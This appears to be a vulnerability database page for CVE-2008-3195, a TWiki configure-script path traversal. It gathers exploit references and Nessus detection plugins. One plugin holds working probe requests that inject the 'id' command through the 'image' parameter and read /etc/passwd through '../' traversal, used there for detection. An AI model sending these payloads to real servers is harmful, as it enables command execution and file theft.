Vulnerabilities > CVE-2008-3195 - Path Traversal vulnerability in Twiki

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
twiki
CWE-22
nessus
exploit available

Summary

Directory traversal vulnerability in bin/configure in TWiki before 4.2.3, when a certain step in the installation guide is skipped, allows remote attackers to read arbitrary files via a query string containing a .. (dot dot) in the image variable, and execute arbitrary files via unspecified vectors.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

  • descriptionTWiki 4.2.0 (configure) Remote File Disclosure Vulnerability. CVE-2008-3195,CVE-2008-4112. Webapps exploit for cgi platform
    fileexploits/cgi/webapps/6269.txt
    idEDB-ID:6269
    last seen2016-02-01
    modified2008-08-19
    platformcgi
    port
    published2008-08-19
    reporterTh1nk3r
    sourcehttps://www.exploit-db.com/download/6269/
    titleTWiki 4.2.0 configure Remote File Disclosure Vulnerability
    typewebapps
  • descriptionTWiki <= 4.2.2 (action) Remote Code Execution Vulnerability. CVE-2008-3195,CVE-2008-4112. Webapps exploit for cgi platform
    idEDB-ID:6509
    last seen2016-02-01
    modified2008-09-21
    published2008-09-21
    reporterwebDEViL
    sourcehttps://www.exploit-db.com/download/6509/
    titleTWiki <= 4.2.2 action Remote Code Execution Vulnerability

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-1639.NASL
    descriptionIt was discovered that twiki, a web-based collaboration platform, didn
    last seen2020-06-01
    modified2020-06-02
    plugin id34246
    published2008-09-22
    reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/34246
    titleDebian DSA-1639-1 : twiki - command execution
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-1639. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(34246);
      script_version("1.14");
      script_cvs_date("Date: 2019/08/02 13:32:21");
    
      script_cve_id("CVE-2008-3195");
      script_xref(name:"DSA", value:"1639");
    
      script_name(english:"Debian DSA-1639-1 : twiki - command execution");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "It was discovered that twiki, a web-based collaboration platform,
    didn't properly sanitize the image parameter in its configuration
    script. This could allow remote users to execute arbitrary commands
    upon the system, or read any files which were readable by the
    webserver user."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=499534"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2008/dsa-1639"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the twiki package.
    
    For the stable distribution (etch), this problem has been fixed in
    version 1:4.0.5-9.1etch1."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_cwe_id(22);
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:twiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2008/09/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2008/09/22");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"4.0", prefix:"twiki", reference:"1:4.0.5-9.1etch1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idTWIKI_IMAGE_DIR_TRAVERSAL.NASL
    descriptionThe version of TWiki running on the remote host allows access to the
    last seen2020-06-01
    modified2020-06-02
    plugin id34031
    published2008-08-23
    reporterThis script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/34031
    titleTWiki bin/configure 'image' Parameter Traversal Arbitrary File Access/Execution
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(34031);
      script_version("1.18");
      script_cvs_date("Date: 2018/08/15 16:35:42");
    
      script_cve_id("CVE-2008-3195");
      script_xref(name:"EDB-ID", value:"6269");
      script_xref(name:"EDB-ID", value:"6509");
    
      script_name(english:"TWiki bin/configure 'image' Parameter Traversal Arbitrary File Access/Execution");
      script_summary(english:"Attempts to execute a command or read a local file.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a CGI script that is affected by multiple
    vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of TWiki running on the remote host allows access to the
    'configure' script, and fails to sanitize the 'image' parameter of
    that script. When the 'action' parameter is set to 'image', an
    unauthenticated attacker can exploit this issue to execute arbitrary
    code or to view arbitrary files on the remote host subject to the
    privileges of the web server user id.
    
    Note that the TWiki Installation Guide says the 'configure' script
    should never be left open to the public.");
      script_set_attribute(attribute:"see_also", value:"http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide");
      script_set_attribute(attribute:"see_also", value:"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-3195");
      script_set_attribute(attribute:"solution", value:
    "Configure the web server to limit access to 'configure', either based
    on IP address or a specific user, according to the TWiki Installation
    Guide referenced above. Upgrades and hotfixes are also available from
    the vendor advisory listed above.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_cwe_id(22);
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2008/09/20");
      script_set_attribute(attribute:"patch_publication_date", value:"2008/09/12");
      script_set_attribute(attribute:"plugin_publication_date", value:"2008/08/23");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:twiki:twiki");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("twiki_detect.nasl");
      script_require_keys("installed_sw/TWiki");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("url_func.inc");
    include("install_func.inc");
    
    app = "TWiki";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:80);
    
    install = get_single_install(
      app_name : app,
      port     : port
    );
    
    dir = install['path'];
    install_url = build_url(port:port, qs:dir);
    
    if ("cgi-bin" >!< dir)
    {
      dir = ereg_replace(pattern:"(/[^/]+/).*", string:dir, replace:"\1");
      dir = dir + "bin/";
    }
    else
      dir = dir - "view";
    
    cmd = "id";
    cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";
    file =  mult_str(str:"../", nb:12) + "etc/passwd";
    file_pat = "root:.*:0:[01]:";
    
    # First try to execute a command.
    url = "configure?action=image;image=|" + urlencode(str:cmd) + "|;type=text/plain";
    
    res = http_send_recv3(method:"GET", item:dir + url, port:port, exit_on_fail:TRUE);
    
    if (ereg(pattern:cmd_pat, string:res[2], multiline:TRUE))
    {
      security_report_v4(
        port       : port,
        severity   : SECURITY_WARNING,
        cmd        : cmd,
        request    : make_list(build_url(qs:dir+url, port:port)),
        output     : chomp(res[2])
      );
      exit(0);
    }
    
    if (!thorough_tests) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
    # Try to read a file if command execution didn't work.
    url = "configure?action=image;image=" + file + ";type=text/plain";
    
    res = http_send_recv3(
      method       : "GET",
      item         : dir + url,
      port         : port,
      exit_on_fail : TRUE
    );
    
    # There's a problem if looks like the file.
    if (ereg(pattern:file_pat, string:res[2], multiline:TRUE))
    {
      file = str_replace(find:"../", replace:"", string:file);
      file = "/" + file;
    
      security_report_v4(
        port        : port,
        severity    : SECURITY_WARNING,
        file        : file,
        request     : make_list(build_url(qs:dir+url, port:port)),
        output      : chomp(res[2]),
        attach_type : 'text/plain'
      );
      exit(0);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_9227DCAF827F11DD9CD70050568452AC.NASL
    descriptionTh1nk3r reports : The version of TWiki installed on the remote host allows access to the
    last seen2020-06-01
    modified2020-06-02
    plugin id34206
    published2008-09-15
    reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/34206
    titleFreeBSD : twiki -- Arbitrary code execution in session files (9227dcaf-827f-11dd-9cd7-0050568452ac)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(34206);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:32:39");
    
      script_cve_id("CVE-2008-3195");
      script_xref(name:"CERT", value:"362012");
    
      script_name(english:"FreeBSD : twiki -- Arbitrary code execution in session files (9227dcaf-827f-11dd-9cd7-0050568452ac)");
      script_summary(english:"Checks for updated package in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote FreeBSD host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Th1nk3r reports :
    
    The version of TWiki installed on the remote host allows access to the
    'configure' script and fails to sanitize the 'image' parameter of that
    script of directory traversal sequences before returning the file
    contents when the 'action' parameter is set to 'image'. An
    unauthenticated attacker can leverage this issue to view arbitrary
    files on the remote host subject to the privileges of the web server
    user id. ."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-3195"
      );
      # http://www.nessus.org/plugins/index.php?view=single&id=34031
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.tenable.com/plugins/nessus/34031"
      );
      # https://vuxml.freebsd.org/freebsd/9227dcaf-827f-11dd-9cd7-0050568452ac.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?9d52df7d"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_cwe_id(22);
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:twiki");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2008/08/05");
      script_set_attribute(attribute:"patch_publication_date", value:"2008/09/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2008/09/15");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"twiki<4.2.3")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/70182/twiki-exec.txt
idPACKETSTORM:70182
last seen2016-12-05
published2008-09-22
reporterwebDEViL
sourcehttps://packetstormsecurity.com/files/70182/twiki-exec.txt.html
titletwiki-exec.txt

Seebug

  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:65731
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-65731
    titleTWiki <= 4.2.2 (action) Remote Code Execution Vulnerability
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:9549
    last seen2017-11-19
    modified2008-09-22
    published2008-09-22
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-9549
    titleTWiki &lt;= 4.2.2 (action) Remote Code Execution Vulnerability